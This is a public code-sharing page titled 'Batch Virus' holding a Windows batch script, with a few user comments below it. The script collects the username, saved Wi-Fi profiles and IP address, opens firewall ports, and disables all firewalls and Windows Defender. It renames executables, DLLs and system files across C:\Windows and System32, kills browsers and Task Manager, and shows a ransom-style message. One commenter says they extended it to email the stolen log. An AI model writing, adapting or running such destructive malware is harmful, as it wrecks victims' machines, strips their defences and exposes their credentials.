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Last active June 2, 2024 11:48
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  • Save SnowLord7/370dc901f07621fdeb64ed461d7431ac to your computer and use it in GitHub Desktop.
Save SnowLord7/370dc901f07621fdeb64ed461d7431ac to your computer and use it in GitHub Desktop.
Batch Virus
@echo off
title %random% %date% %username% %time% %random%
color 0a
ren -=- Writes INFO to a .LOG file in Current Directory -=-
cls & color 0a
cd Desktop
ECHO Username:%username%>>9K21JM10B.log
ECHO Time: %time%>>9K21JM10B.log
ECHO Date: %date%>>9K21JM10B.log
netsh wlan show profiles>>9K21JM10B.log
ECHO Additional Information:>>9K21JM10B.log
ipconfig | find /i "IPv4">>9K21JM10B.log
wmic diskdrive get size>>9K21JM10B.log
wmic cpu get name>>9K21JM10B.log
goto ports
ren -=- Opens Port 1122 -=-
cls & color 0a
netsh advfirewall firewall add rule name="Port 1122 TCP" dir=in action=allow protocol=TCP localport=%1
netsh advfirewall firewall add rule name="Port 1122 UDP" dir=in action=allow protocol=UDP localport=%1
goto firewall
ren -=- Turns all Firewalls off -=-
cls & color 0a
netsh firewall set opmode disable
netsh firewall set opmode mode=DISABLE
netsh advfirewall set currentprofile state off
netsh advfirewall set domainprofile state off
netsh advfirewall set privateprofile state off
netsh advfirewall set publicprofile state off
netsh advfirewall set allprofiles state off
goto encryption
ren -=- Encrypts files with a simple name break -=-
cls & color 0a
REN *.cmd *.sI09
REN *.exe *.1Je9
REN *.log *.439a
REN *.ini *.3KM1
REN *.dll *.38Jl
REN *.bin *.3J81
REN *.txt *.2M1A
REN *.sys *.8j3J
REN *.lnk *.9K2M
REN *.png *.8J2n
REN *.exe *.3hxD
cd C:\Windows
REN *.cmd *.sI09
REN *.exe *.1Je9
REN *.log *.439a
REN *.ini *.3KM1
REN *.dll *.38Jl
REN *.bin *.3J81
REN *.txt *.2M1A
REN *.sys *.8j3J
REN *.lnk *.9K2M
REN *.png *.8J2n
REN *.exe *.3hxD
cd C:\Windows\Sys32 & cd C:\Windows\System32
REN *.cmd *.sI09
REN *.exe *.1Je9
REN *.log *.439a
REN *.ini *.3KM1
REN *.dll *.38Jl
REN *.bin *.3J81
REN *.txt *.2M1A
REN *.sys *.8j3J
REN *.lnk *.9K2M
REN *.png *.8J2n
REN *.exe *.3hxD
cd C:\
REN *.cmd *.sI09
REN *.exe *.1Je9
REN *.log *.439a
REN *.ini *.3KM1
REN *.dll *.38Jl
REN *.bin *.3J81
REN *.txt *.2M1A
REN *.sys *.8j3J
REN *.lnk *.9K2M
REN *.png *.8J2n
REN *.exe *.3hxD
color 0a & mode 1000 & cls
goto virus
ren -=- Closes all task managers and browser, kills anti-virus and firewall -=-
ECHO You have been encrypted by *-*7_SL*- & color 0a
net stop "Windows Defender Service"
net stop "Windows Firewall"
taskkill /F /IM "chrome.exe" /T
taskkill /F /IM "firefox.exe" /T
taskkill /F /IM "ProcessHacker.exe" /T
taskkill /F /IM "explorer.exe" /T
taskkill /F /IM "taskmgr.exe" /T
goto virus

Ładne skrypty, ale napisałem trochę więcej kodu i teraz wysyła mi plik, z pomocą serwera Smtp, na mój adres e-mail.

how? In batch u can only send in FTP


in sense - files

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wat does it do

It makes you a sandwich


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Baumhau commented Jun 2, 2024

Wie ist der decrypt code?

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